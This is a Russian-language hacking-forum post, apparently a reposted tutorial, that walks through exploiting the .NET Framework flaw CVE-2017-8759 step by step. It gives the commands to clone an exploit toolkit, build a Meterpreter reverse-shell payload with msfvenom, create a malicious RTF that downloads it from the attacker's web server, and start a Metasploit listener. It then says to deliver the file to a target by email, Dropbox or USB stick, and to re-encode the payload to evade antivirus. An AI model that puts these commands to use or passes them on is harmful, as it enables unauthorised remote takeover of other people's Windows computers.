Как взломать практически любую систему Windows с помощью CVE-2017-8759

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
12 сентября 2017 года компания FireEye сообщила об обнаружении вредоносного ПО, эксплуатирующего уязвимость CVE-2017-8759. Это вредоносное ПО использует уязвимость в .NET Framework, которая позволяет злоумышленнику удалённо выполнить код на целевой системе (RCE). Это серьёзная проблема, поскольку удалённое выполнение кода означает, что злоумышленник может запустить свой собственный код на удалённой системе и контролировать её или «владеть» ею.

В сети была обнаружена новая вредоносная программа, получившая название Zyklon, использующая этот эксплойт.

Прелесть этого эксплойта в том, что он применим практически к любой системе Windows.

6a4a49_6111393f7b85465aae301b16cd7f81c3~mv2.jpg


Этот эксплойт внедряет команду для подключения целевой системы к веб-серверу в нашей системе. Там команда получит нашу полезную нагрузку (windows/meterpreter/reverse_tcp) и установит её на целевой системе. Затем полезная нагрузка подключится к прослушивателю, который мы запускаем в Metasploit (multi/handler).

Для реализации части этой уязвимости мы будем использовать Metasploit, поэтому, если вы не знакомы с Metasploit, ознакомьтесь с моей серией статей «Основы Metasploit» здесь, на Hackers-Arise.

В этом уроке я буду использовать имя «gotcha» для файлов .rtf, .exe и .txt. Надеюсь, это не создаёт путаницы. Все это отдельные файлы с уникальными расширениями.

Шаг №1: Загрузите с Github.com

Первый шаг — запустить Kali и открыть терминал.

6a4a49_c7c3eadaea854f95b698e3782332aa90~mv2.png


Когда у вас откроется терминал, мы начнем с загрузки удобного скрипта Python для эксплуатации CVE-2017-8759.

kali > git clone https://github.com/bhdresh/CVE-2017-8759

6a4a49_66b17fe3d0b44a278ef06037a97c80c9~mv2.png


После успешной загрузки нам необходимо изменить каталог на новый каталог CVE-2017-8759 .

kali > cd CVE-2017-8759

Теперь составьте длинный список этого каталога.

кали > ls -l

6a4a49_4831fa9ffdf6491bba77adc14f47e6e5~mv2.png


Как видите, у нас есть файлы cve-2017-8759_toolkit.py и README.md. Очевидно, один из них — скрипт на Python, а другой — инструкции.

Прежде чем что-либо сделать, нам нужно дать себе разрешение на выполнение файла с помощью chmod .

Кали > chmod 755 cve-2017-8759_toolkit.py

Теперь, когда у нас есть разрешения на выполнение файла, давайте заглянем в README, чтобы получить справку о том, как использовать этот скрипт.

kali > more README.md

Основные переключатели в этом скрипте вы можете увидеть ниже.

6a4a49_6abb37f5c74e47239bc1b1101964a0f8~mv2.png
6a4a49_6b7c59af2c3d4715a3daf3cc47508054~mv2.png


Обратите внимание на пример команды на скриншоте выше. Мы будем использовать практически идентичную команду.

6a4a49_1147ce7a86084028a264de1d46468907~mv2.png


Шаг №2: Создайте полезную нагрузку Meterpreter для кода, который будет извлечен с нашего веб-сервера

Прежде чем начать работу со скриптом Python, давайте создадим полезную нагрузку, которую мы в конечном итоге разместим на целевой системе, которая будет подключаться к нашей системе. Для создания полезной нагрузки мы будем использовать msfvenom из Metasploit. Убедитесь, что в LHOST указан IP-адрес вашей системы. Полезную нагрузку мы разместим в каталоге /tmp и назовём её gotcha.exe.

kali > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6996 -f exe > /tmp/gotcha.exe

6a4a49_03a410c857374077a58f54537213a101~mv2.png


Шаг №3: Создайте вредоносный RTF-файл

Далее нам нужно создать вредоносный файл .rtf. Аналогично примеру команды в файле README.md, но мы используем свой IP-адрес и создадим файл с именем «Gotcha.rtf».

kali > python cve-2017-8759_toolkit.py -M gen -w Gotcha.rtf -u http://192.168.1.101/gotcha.txt

6a4a49_537c5db6050e4f11ad3eea3ca209c348~mv2.png


Если теперь просмотреть длинный список содержимого каталога, то можно увидеть, что был создан вредоносный файл .rtf.

Шаг №4: Разместите полезную нагрузку на нашем веб-сервере

Далее нам нужно разместить эту полезную нагрузку на веб-сервере. Наш скрипт позволяет настроить веб-сервер, на котором будет размещена полезная нагрузка. При запуске эксплойта он извлечет эту полезную нагрузку и разместит её на целевой системе.

kali > python cve-2017-8759_toolkit.py -M exp -e http://192.168.1.101/gotcha.exe -l /tmp/gotcha.exe

6a4a49_4f580bca41ed4167b44110b7a0b3a63c~mv2.png


Когда мы нажимаем ENTER, скрипт запускает веб-сервер на порту 80, к которому подключится вредоносная программа и доставит полезную нагрузку, которую мы создали с помощью msfvenom на шаге 2 выше.

Шаг №5: Откройте многопользовательский обработчик для прослушивания соединения.

Теперь нам нужно открыть прослушиватель в нашей системе для подключения к полезной нагрузке meterpreter, когда она выполняется в целевой системе.

kali > msfconsole

6a4a49_a73adfa7266f4e51bc6630689b051a85~mv2.png


msf > использовать mult/handler

msf > set PAYLOAD windows/meterpreter/reverse_tcp

msf > установить LHOST 192.68.1.101

msf > установить LPORT 6996

Шаг №6: Отправьте вредоносный .rtf-файл цели


Наконец, нам нужно отправить вредоносный RTF-файл по электронной почте, через DropBox, флешку и т. д. целевой системе. Когда целевая система открывает файл, вредоносный код в RTF-файле подключается к нашему веб-серверу через порт 80, получает полезную нагрузку, созданную в msfvenom, которая подключается к нашему слушателю в Metasploit и выводит нам приглашение meterpreter!

6a4a49_e17166f0b6254ea6b291913c07b1b233~mv2.png


Теперь система принадлежит нам!

Конечно, одна из возможных загвоздок в этом сценарии — это то, что система была обновлена. Другая возможная загвоздка — антивирусное ПО обнаруживает нашу полезную нагрузку. В этом случае попробуйте перекодировать её с помощью OWASP-ZSC.
 
Назад
Сверху Снизу